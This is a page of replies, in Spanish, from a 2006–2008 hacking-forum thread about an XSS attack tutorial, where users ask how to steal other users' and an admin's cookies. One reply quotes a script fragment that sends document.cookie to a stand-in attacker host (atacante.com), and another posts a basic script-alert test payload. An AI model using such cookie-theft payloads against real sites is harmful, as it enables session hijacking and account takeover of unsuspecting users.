elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 15:06  



+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderador: yeikos)
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 30518 veces)
Ch@CaL

Desconectado Desconectado

Mensajes: 27


All in your mind....


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #30 en: 11 Septiembre 2006, 16:49 »

Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?
En línea

Ch@CaL
|Azrack|

Desconectado Desconectado

Mensajes: 85


Enjoy The Silence


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #31 en: 06 Diciembre 2006, 00:03 »

y si yo le paaso solo el enlace:
Código:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?
En línea

Hay gente tan Ignorante que cree en dios.

Status MSN:>><<
security

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #32 en: 22 Mayo 2007, 17:06 »

<script>alert()</script>
En línea
Dr. Stephen Falken

Desconectado Desconectado

Mensajes: 1



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #33 en: 09 Enero 2008, 19:46 »

A día de hoy esta vulnerabilidad está casi capada. No?
En línea
NaphacK

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #34 en: 30 Enero 2008, 20:20 »

A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables...
 Aunque tengo una duda...
 Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
 www.webvulnerable.com/free-press/unaslibrerias   por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
 Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
 Saludos...
 ;) ;) ;)
En línea
Páginas: 1 2 [3] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats